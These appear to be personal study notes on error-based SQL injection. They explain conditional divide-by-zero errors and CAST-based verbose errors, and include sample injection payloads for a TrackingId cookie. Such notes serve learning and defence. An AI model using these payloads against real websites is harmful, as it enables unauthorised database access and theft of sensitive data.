cases where you're able to use error messages to either extract or infer sensitive data from the database, even in blind contexts
Types of errors:
return specific error response based on the boolean expression. same as conditional responses.
suppose that two requests are sent containing the following TrackingId cookie values in turn:
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
CASE keyword to test a condition and return a expression if true. in the first case, the condition was false i.e 1≠2 so evaluated to ‘a’ in the second case, 1=1 is true so it evaluated to 1/0 which causes a divide-by-zero error.
From the error causing a difference in the response, we can determine whether the injected condition is true.
trigger error messages that output the data returned by the query.
db can be misconfigured and sometimes the error messages that are shown, could be verbose ones. this can be used to convert a blindly injecting to a visible one.
CAST() function can be used to convert one data type to another.
For example, imagine a query containing the following statement: CAST((SELECT example_column FROM example_table) AS int) . Often the data we read is string, we can convert it into incompatible data type, such as an int, may cause an error similar to the following: ERROR: invalid input syntax for type integer: "Example data"